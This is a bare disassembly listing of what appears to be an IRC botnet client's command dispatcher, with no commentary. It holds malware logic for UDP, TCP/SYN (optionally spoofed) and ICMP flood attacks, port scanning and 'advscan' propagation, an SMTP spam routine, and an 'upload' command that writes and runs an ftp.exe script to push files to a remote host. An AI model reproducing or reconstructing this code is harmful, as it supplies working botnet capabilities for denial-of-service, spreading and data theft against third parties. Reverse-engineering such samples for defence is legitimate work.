lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_36AC]
push ebx
push eax
push offset sub_4141B2
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_34A8]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4067CA
loc_4067B4: ; CODE XREF: sub_401ACD+4CFB�j
cmp [ebp+var_349C], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4067B4
; ---------------------------------------------------------------------------
loc_4067CA: ; CODE XREF: sub_401ACD+4CE5�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42B05C
jmp loc_407187
; ---------------------------------------------------------------------------
loc_4067DB: ; CODE XREF: sub_401ACD+4C20�j
push [ebp+arg_8]
push offset aPhatwonk ; "phatwonk"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407CB2
push [ebp+arg_8]
push offset aWonk ; "wonk"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407CB2
push [ebp+arg_8]
push offset aNazel3 ; "NAZEL3"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407B74
push [ebp+arg_8]
push offset aNazel3 ; "NAZEL3"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407B74
push [ebp+arg_8]
push offset aRedirect ; "redirect"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407A77
push [ebp+arg_8]
push offset aRd ; "rd"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407A77
push [ebp+arg_8]
push offset aScan_0 ; "scan"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407984
push [ebp+arg_8]
push offset aSc ; "sc"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407984
push [ebp+arg_8]
push offset aC_privmsg ; "c_privmsg"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407887
push [ebp+arg_8]
push offset aC_pm ; "c_pm"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407887
push [ebp+arg_8]
push offset aC_action ; "c_action"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407797
push [ebp+arg_8]
push offset aC_a ; "c_a"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407797
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_401F75
push [ebp+arg_8]
push offset aPortscan ; "portscan"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407691
push [ebp+arg_8]
push offset aPsc ; "psc"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407691
push [ebp+arg_8]
push offset aAdvscan ; "advscan"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4071B6
push [ebp+arg_8]
push offset aAd ; "ad"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4071B6
push [ebp+arg_8]
push offset aUdpflood ; "udpflood"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40706D
push [ebp+arg_8]
push offset aUdp ; "udp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40706D
push [ebp+arg_8]
push offset aU ; "u"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40706D
push [ebp+arg_8]
push offset aNetsend ; "netsend"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_406F5F
push [ebp+arg_8]
push offset aNs ; "ns"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_406F5F
push [ebp+arg_8]
push offset aPingflood ; "pingflood"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_406E35
push [ebp+arg_8]
push offset aPing_0 ; "ping"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_406E35
push [ebp+arg_8]
push offset aP ; "p"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_406E35
push [ebp+arg_8]
push offset aVnchost ; "vnchost"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_406A5A
push edi
call sub_41B52C
pop ecx
lea eax, [ebp+var_2C4]
push edi
push offset aVncHttpHostCha ; "VNC: HTTP Host Changed To: %s"
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_401F75
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
jmp loc_4040AB
; ---------------------------------------------------------------------------
loc_406A5A: ; CODE XREF: sub_401ACD+4F56�j
push [ebp+arg_8]
push offset aTcpflood ; "tcpflood"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_406C8E
push [ebp+arg_8]
push offset aTcp ; "tcp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_406C8E
push [ebp+arg_8]
push offset aEmail ; "email"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_406C36
lea eax, [ebp+var_46F0]
push edi
push eax
call sub_41C890
push [ebp+arg_18]
call sub_41C159
push [ebp+arg_0]
mov [ebp+arg_18], eax
lea eax, [ebp+var_438C]
push eax
call sub_41C890
push [ebp+arg_10]
lea eax, [ebp+var_458C]
push eax
call sub_41C890
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push [ebp+esi+var_7C]
call sub_41843B
push eax
lea eax, [ebp+var_408C]
push eax
call sub_41C890
add esp, 30h
lea eax, [ebp+var_528C]
push eax
push 101h
call dword_4CB944 ; WSAStartup
lea eax, [ebp+var_46F0]
push eax
call dword_4CBA58 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_4CBA54 ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_31C], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_318], eax
call dword_4CB9D4 ; htons
mov [ebp+var_31A], ax
lea eax, [ebp+var_408C]
push eax
lea eax, [ebp+var_438C]
push eax
lea eax, [ebp+var_408C]
push eax
lea eax, [ebp+var_458C]
push eax
lea eax, [ebp+var_438C]
push eax
lea eax, [ebp+var_568C]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_41C266
add esp, 1Ch
lea eax, [ebp+var_31C]
push 10h
push eax
push esi
call dword_4CB97C ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_448C]
push edi
push eax
push esi
call dword_4CB9EC ; recv
lea eax, [ebp+var_448C]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_568C]
push eax
push esi
call dword_4CBA24 ; send
push ebx
lea eax, [ebp+var_448C]
push edi
push eax
push esi
call dword_4CB9EC ; recv
push esi
call dword_4CBA6C ; closesocket
call dword_4CB92C ; WSACleanup
lea eax, [ebp+var_458C]
push eax
push offset unk_42AEFC
loc_406BEF: ; CODE XREF: sub_401ACD+2E3F�j
; sub_401ACD+4561�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
loc_406BFB: ; CODE XREF: sub_401ACD+2431�j
add esp, 0Ch
loc_406BFE: ; CODE XREF: sub_401ACD+4485�j
; sub_401ACD+6575�j ...
cmp [ebp+var_8], ebx
jnz short loc_406C1F
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_406C1F: ; CODE XREF: sub_401ACD+296F�j
; sub_401ACD+29C2�j ...
mov esi, [ebp+arg_24]
loc_406C22: ; CODE XREF: sub_401ACD+6814�j
; sub_401ACD+773F�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
pop ecx
mov eax, esi
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_406C36: ; CODE XREF: sub_401ACD+4FCC�j
push [ebp+arg_8]
push offset aHttpcon ; "httpcon"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_406C60
push [ebp+arg_8]
push offset aHcon ; "hcon"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_407208
loc_406C60: ; CODE XREF: sub_401ACD+517A�j
push [ebp+esi+var_7C]
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
call sub_41C159
pop ecx
push eax
push edi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_410ADC
jmp loc_404085
; ---------------------------------------------------------------------------
loc_406C8E: ; CODE XREF: sub_401ACD+4F9E�j
; sub_401ACD+4FB5�j
mov esi, 80h
push edi
lea eax, [ebp+var_1358]
push esi
push eax
call sub_41C360
lea eax, [ebp+var_1358]
push eax
push offset aSyn ; "syn"
call sub_41CA50
add esp, 14h
test eax, eax
jz short loc_406CF1
lea eax, [ebp+var_1358]
push eax
push offset aAck ; "ack"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_406CF1
lea eax, [ebp+var_1358]
push eax
push offset aRandom_0 ; "random"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_406CF1
push offset unk_42AEB4
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_406CF1: ; CODE XREF: sub_401ACD+51EA�j
; sub_401ACD+5201�j ...
push [ebp+arg_10]
call sub_41C159
cmp eax, ebx
pop ecx
mov [ebp+var_1250], eax
jle loc_406E1D
push edi
lea eax, [ebp+var_1358]
push esi
push eax
call sub_41C360
add esp, 0Ch
lea eax, [ebp+var_13D8]
push [ebp+arg_18]
push esi
push eax
call sub_41C360
push [ebp+arg_0]
call sub_41C159
mov [ebp+var_1254], eax
add esp, 10h
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+var_88]
setnz al
mov [ebp+var_124C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13DC], eax
lea eax, [ebp+var_12D8]
push esi
push eax
call sub_41C360
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_124C], ebx
mov [ebp+var_1248], eax
mov eax, [ebp+var_8]
mov [ebp+var_1244], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_406D8E
mov eax, offset aNormal ; "Normal"
loc_406D8E: ; CODE XREF: sub_401ACD+52BA�j
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push eax
push offset unk_42AE70
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41C360
push ebx
lea eax, [ebp+var_2C4]
push 14h
push eax
call sub_40B3BA
add esp, 2Ch
mov [ebp+var_1258], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_13DC]
push ebx
push eax
push offset sub_4149C1
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1258]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_406E0C
loc_406DF6: ; CODE XREF: sub_401ACD+533D�j
cmp [ebp+var_1240], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_406DF6
; ---------------------------------------------------------------------------
loc_406E0C: ; CODE XREF: sub_401ACD+5327�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AE38
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_406E1D: ; CODE XREF: sub_401ACD+5235�j
push offset unk_42AE00
loc_406E22: ; CODE XREF: sub_401ACD+1FBE�j
; sub_401ACD+1FD4�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
pop ecx
pop ecx
jmp loc_4081AD
; ---------------------------------------------------------------------------
loc_406E35: ; CODE XREF: sub_401ACD+4F11�j
; sub_401ACD+4F28�j ...
cmp dword_4CBAC4, ebx
jnz loc_406F44
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_FF8], eax
mov eax, [ebp+var_4]
mov [ebp+var_FFC], eax
lea eax, [ebp+var_1090]
push edi
push eax
call sub_41BFD0
push [ebp+arg_18]
call sub_41C159
push [ebp+arg_0]
mov [ebp+var_1010], eax
call sub_41C159
push [ebp+arg_10]
mov [ebp+var_100C], eax
call sub_41C159
push 7Fh
mov [ebp+var_1008], eax
push [ebp+var_88]
lea eax, [ebp+var_1110]
push eax
call sub_41BFD0
mov eax, [ebp+arg_4]
add esp, 24h
mov [ebp+var_1114], eax
lea eax, [ebp+var_1090]
push [ebp+var_1008]
push [ebp+var_100C]
push eax
lea eax, [ebp+var_2C4]
push [ebp+var_1010]
push offset unk_42ADB8
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 16h
push eax
call sub_40B3BA
add esp, 24h
mov [ebp+var_1000], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1114]
push ebx
push eax
push offset sub_413E10
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1000]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_406F33
loc_406F1D: ; CODE XREF: sub_401ACD+5464�j
cmp [ebp+var_FF4], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_406F1D
; ---------------------------------------------------------------------------
loc_406F33: ; CODE XREF: sub_401ACD+544E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AD80
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_406F44: ; CODE XREF: sub_401ACD+536E�j
push 1FFh
lea eax, [ebp+var_2C4]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_41BFD0
jmp loc_4081AA
; ---------------------------------------------------------------------------
loc_406F5F: ; CODE XREF: sub_401ACD+4EE3�j
; sub_401ACD+4EFA�j
push [ebp+arg_18]
lea eax, [ebp+var_2C4]
push edi
push [ebp+arg_0]
push offset unk_42AD2C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
push [ebp+arg_0]
call sub_41B9C0
push [ebp+arg_18]
mov edi, eax
call sub_41B9C0
push [ebp+arg_20]
add edi, eax
call sub_41B9C0
push [ebp+arg_8]
add edi, eax
call sub_41B9C0
add eax, [ebp+var_C]
push [ebp+arg_10]
lea eax, [eax+edi+7]
push eax
call sub_41C2E0
add esp, 40h
mov [ebp+arg_C], eax
push [ebp+arg_0]
call sub_41C159
mov edi, [ebp+arg_20]
cmp eax, ebx
pop ecx
mov [ebp+arg_14], eax
mov [ebp+arg_1C], ebx
jle short loc_407059
loc_406FE2: ; CODE XREF: sub_401ACD+5539�j
push [ebp+arg_C]
push [ebp+arg_18]
push edi
call sub_418AF1
add esp, 0Ch
cmp eax, 1
mov [ebp+arg_20], eax
jz short loc_40700A
cmp eax, ebx
jnz short loc_407029
inc [ebp+arg_1C]
mov eax, [ebp+arg_1C]
cmp eax, [ebp+arg_14]
jl short loc_406FE2
jmp short loc_407062
; ---------------------------------------------------------------------------
loc_40700A: ; CODE XREF: sub_401ACD+552A�j
push ebx
push [ebp+var_4]
push offset unk_42ACF4
loc_407013: ; CODE XREF: sub_401ACD+559E�j
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
jmp loc_407208
; ---------------------------------------------------------------------------
loc_407029: ; CODE XREF: sub_401ACD+552E�j
push [ebp+arg_20]
lea eax, [ebp+var_2C4]
push offset unk_42ACC0
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 20h
loc_407059: ; CODE XREF: sub_401ACD+5513�j
cmp [ebp+arg_20], ebx
jnz loc_407208
loc_407062: ; CODE XREF: sub_401ACD+553B�j
push ebx
push [ebp+var_4]
push offset unk_42AC8C
jmp short loc_407013
; ---------------------------------------------------------------------------
loc_40706D: ; CODE XREF: sub_401ACD+4E9E�j
; sub_401ACD+4EB5�j ...
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_C68], eax
mov eax, [ebp+var_4]
loc_40707B: ; DATA XREF: .data:004330E0�o
; .data:004330F4�o ...
mov [ebp+var_C6C], eax
lea eax, [ebp+var_D00]
push edi
push eax
call sub_41BFD0
push [ebp+arg_18]
call sub_41C159
push [ebp+arg_0]
mov [ebp+var_C80], eax
call sub_41C159
push [ebp+arg_10]
mov [ebp+var_C7C], eax
call sub_41C159
mov esi, [ebp+esi+var_7C]
add esp, 18h
cmp esi, ebx
mov [ebp+var_C78], eax
jz short loc_4070D2
push esi
call sub_41C159
pop ecx
mov [ebp+var_C74], eax
jmp short loc_4070D8
; ---------------------------------------------------------------------------
loc_4070D2: ; CODE XREF: sub_401ACD+55F4�j
mov [ebp+var_C74], ebx
loc_4070D8: ; CODE XREF: sub_401ACD+5603�j
push 7Fh
lea eax, [ebp+var_D80]
push [ebp+var_88]
push eax
call sub_41BFD0
add esp, 0Ch
mov esi, [ebp+arg_4]
lea eax, [ebp+var_D00]
mov [ebp+var_D84], esi
push [ebp+var_C78]
push [ebp+var_C7C]
push eax
lea eax, [ebp+var_2C4]
push [ebp+var_C80]
push offset unk_42AC44
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 17h
push eax
call sub_40B3BA
add esp, 24h
mov [ebp+var_C70], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_D84]
push ebx
push eax
push offset sub_413F9C
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_C70]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40717B
loc_407169: ; CODE XREF: sub_401ACD+56AC�j
cmp [ebp+var_C64], ebx
jnz short loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407169
; ---------------------------------------------------------------------------
loc_40717B: ; CODE XREF: sub_401ACD+569A�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AC0C
loc_407187: ; CODE XREF: sub_401ACD+4D09�j
; sub_401ACD+61E0�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
loc_407196: ; CODE XREF: sub_401ACD+4CED�j
; sub_401ACD+56A2�j ...
cmp [ebp+var_8], ebx
jnz loc_4082DE
push ebx
push [ebp+var_4]
loc_4071A3: ; CODE XREF: sub_401ACD+2284�j
lea eax, [ebp+var_2C4]
push eax
push [ebp+var_88]
push esi
jmp loc_4081CA
; ---------------------------------------------------------------------------
loc_4071B6: ; CODE XREF: sub_401ACD+4E70�j
; sub_401ACD+4E87�j
push 0Bh
call sub_40B602
push [ebp+arg_18]
mov [ebp+arg_1C], eax
call sub_41C159
add eax, [ebp+arg_1C]
pop ecx
pop ecx
cmp eax, 320h
jle loc_407381
push [ebp+arg_1C]
lea eax, [ebp+var_2C4]
push offset unk_42ABD0
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 20h
loc_407208: ; CODE XREF: sub_401ACD+518D�j
; sub_401ACD+5557�j ...
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz loc_401F75
push [ebp+arg_8]
push offset aUpload ; "upload"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_409644
push 4
push esi
call sub_416CAF
pop ecx
test eax, eax
pop ecx
jnz short loc_407253
push esi
push offset unk_42ABA8
loc_40723F: ; CODE XREF: sub_401ACD+711E�j
; sub_401ACD+796B�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
jmp loc_403F9D
; ---------------------------------------------------------------------------
loc_407253: ; CODE XREF: sub_401ACD+576A�j
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_41C2C2
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_41C2C2
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_41C2C2
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_50FC]
push edx
push eax
lea eax, [ebp+var_2E5C]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_41C266
lea eax, [ebp+var_2E5C]
push offset aAb ; "ab"
push eax
call sub_41BEA2
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_401F75
push esi
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_41C7E6
push [ebp+arg_24]
call sub_41BA3B
add esp, 20h
lea eax, [ebp+var_2E5C]
push eax
lea eax, [ebp+var_4CF8]
push offset aSS_2 ; "-s:%s"
push eax
call sub_41C266
add esp, 0Ch
lea eax, [ebp+var_4CF8]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call dword_4CB940
test eax, eax
push edi
push esi
jz short loc_407320
push offset unk_42AB38
jmp short loc_407325
; ---------------------------------------------------------------------------
loc_407320: ; CODE XREF: sub_401ACD+584A�j
push offset unk_42AB08
loc_407325: ; CODE XREF: sub_401ACD+5851�j
call sub_41C266
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40734E
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_40734E: ; CODE XREF: sub_401ACD+5863�j
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
loc_40735A: ; CODE XREF: sub_401ACD+58B2�j
lea eax, [ebp+var_2E5C]
push 4
push eax
call sub_416CAF
add esp, 0Ch
test eax, eax
jz loc_401F75
lea eax, [ebp+var_2E5C]
push eax
call sub_41C7BC
jmp short loc_40735A
; ---------------------------------------------------------------------------
loc_407381: ; CODE XREF: sub_401ACD+5705�j
push edi
call sub_41C159
push [ebp+arg_18]
mov [ebp+var_370], eax
call sub_41C159
push [ebp+arg_0]
mov [ebp+var_358], eax
call sub_41C159
add esp, 0Ch
cmp eax, 5
mov [ebp+var_36C], eax
jnb short loc_4073BA
push 5
pop eax
mov [ebp+var_36C], eax
loc_4073BA: ; CODE XREF: sub_401ACD+58E2�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_4073C7
mov [ebp+var_36C], ecx
loc_4073C7: ; CODE XREF: sub_401ACD+58F2�j
push [ebp+arg_10]
call sub_41C159
cmp eax, 320h
pop ecx
mov [ebp+var_368], eax
jbe short loc_4073E7
mov [ebp+var_368], 320h
loc_4073E7: ; CODE XREF: sub_401ACD+590E�j
or [ebp+var_354], 0FFFFFFFFh
cmp dword_4317F8, ebx
mov [ebp+arg_1C], ebx
jz short loc_40743D
mov [ebp+arg_24], offset dword_4317F8
loc_407400: ; CODE XREF: sub_401ACD+5952�j
mov eax, [ebp+arg_24]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_407423
add [ebp+arg_24], 40h
inc [ebp+arg_1C]
mov eax, [ebp+arg_24]
cmp [eax], ebx
jnz short loc_407400
jmp short loc_40743D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: sub_401ACD+5944�j
mov eax, [ebp+arg_1C]
mov ecx, eax
mov [ebp+var_354], eax
shl ecx, 6
mov ecx, dword_4317F8[ecx]
mov [ebp+var_370], ecx
loc_40743D: ; CODE XREF: sub_401ACD+592A�j
; sub_401ACD+5954�j
cmp [ebp+var_370], ebx
jnz short loc_40744F
push offset unk_42AAD4
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_40744F: ; CODE XREF: sub_401ACD+5976�j
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
mov [ebp+arg_0], edi
jz short loc_40748A
cmp byte ptr [edi], 23h
jz short loc_40748A
push edi
lea eax, [ebp+var_484]
push 10h
push eax
call sub_41C360
push 78h
push edi
call sub_41C990
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_344], eax
jmp loc_407564
; ---------------------------------------------------------------------------
loc_40748A: ; CODE XREF: sub_401ACD+598B�j
; sub_401ACD+5990�j
cmp [ebp+var_8FF], bl
jnz short loc_4074AC
cmp [ebp+var_8FE], bl
jnz short loc_4074AC
cmp [ebp+var_8EE], bl
jnz short loc_4074AC
push offset unk_42AAA0
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_4074AC: ; CODE XREF: sub_401ACD+59C3�j
; sub_401ACD+59CB�j ...
push 10h
lea eax, [ebp+var_2D0]
pop edi
push eax
lea eax, [ebp+var_2F8]
push eax
mov [ebp+var_2D0], edi
push [ebp+arg_4]
call dword_4CB978 ; getsockname
mov al, [ebp+var_8FF]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2F4], eax
push [ebp+var_2F4]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_484]
push eax
call sub_41BFD0
add esp, 0Ch
cmp [ebp+var_8EE], bl
jz short loc_40755E
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_484]
push eax
call sub_41C820
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_407552
loc_407530: ; CODE XREF: sub_401ACD+5A83�j
cmp eax, ebx
jz short loc_407552
mov byte ptr [eax], 78h
lea eax, [ebp+var_484]
push 30h
push eax
call sub_41C820
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_407530
loc_407552: ; CODE XREF: sub_401ACD+5A61�j
; sub_401ACD+5A65�j
mov [ebp+var_344], 1
jmp short loc_407564
; ---------------------------------------------------------------------------
loc_40755E: ; CODE XREF: sub_401ACD+5A3B�j
mov [ebp+var_344], ebx
loc_407564: ; CODE XREF: sub_401ACD+59B8�j
; sub_401ACD+5A8F�j
mov eax, [ebp+arg_4]
push [ebp+var_88]
mov [ebp+var_374], eax
mov eax, [ebp+var_4]
mov [ebp+var_34C], eax
mov eax, [ebp+var_8]
mov [ebp+var_348], eax
mov edi, 80h
lea eax, [ebp+var_474]
push edi
push eax
call sub_41C360
mov esi, [ebp+esi+var_78]
add esp, 0Ch
cmp esi, ebx
jz short loc_4075B5
loc_4075A2: ; CODE XREF: sub_401ACD+5B0B�j
push esi
loc_4075A3: ; CODE XREF: sub_401ACD+5AF5�j
lea eax, [ebp+var_3F4]
push edi
push eax
call sub_41C360
add esp, 0Ch
jmp short loc_4075E0
; ---------------------------------------------------------------------------
loc_4075B5: ; CODE XREF: sub_401ACD+5AD3�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4075C4
cmp byte ptr [eax], 23h
jnz short loc_4075C4
push eax
jmp short loc_4075A3
; ---------------------------------------------------------------------------
loc_4075C4: ; CODE XREF: sub_401ACD+5AED�j
; sub_401ACD+5AF2�j
mov esi, offset aF ; "#f"
push offset byte_43DB88
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4075A2
mov [ebp+var_3F4], bl
loc_4075E0: ; CODE XREF: sub_401ACD+5AE6�j
cmp [ebp+var_344], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_4075F2
mov eax, offset aSequential ; "Sequential"
loc_4075F2: ; CODE XREF: sub_401ACD+5B1E�j
push [ebp+var_358]
lea ecx, [ebp+var_484]
push [ebp+var_368]
push [ebp+var_36C]
push [ebp+var_370]
push ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42AA38
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 0Bh
push eax
call sub_40B3BA
add esp, 2Ch
mov [ebp+var_364], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_484]
push ebx
push eax
push offset sub_40C600
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_364]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407680
loc_40766A: ; CODE XREF: sub_401ACD+5BB1�j
cmp [ebp+var_340], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40766A
; ---------------------------------------------------------------------------
loc_407680: ; CODE XREF: sub_401ACD+5B9B�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AA00
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_407691: ; CODE XREF: sub_401ACD+4E42�j
; sub_401ACD+4E59�j
push edi
call sub_40A8F0
push [ebp+arg_18]
mov [ebp+var_4E0], eax
call sub_41C159
push [ebp+arg_0]
mov [ebp+var_4F0], eax
call sub_41C159
push [ebp+arg_10]
mov [ebp+var_4EC], eax
call sub_41C159
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_4E8], eax
lea eax, [ebp+var_570]
mov [ebp+var_574], esi
push eax
call sub_41BFD0
add esp, 1Ch
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_4D8], edi
push [ebp+var_4EC]
mov [ebp+var_4D4], eax
push [ebp+var_4F0]
push [ebp+var_4E8]
push [ebp+var_4E0]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_2C4]
push offset unk_42A9B0
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 0Bh
push eax
call sub_40B3BA
add esp, 24h
mov [ebp+var_4E4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_574]
push ebx
push eax
push offset sub_40CA1D
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_4E4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407786
loc_407770: ; CODE XREF: sub_401ACD+5CB7�j
cmp [ebp+var_4D0], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407770
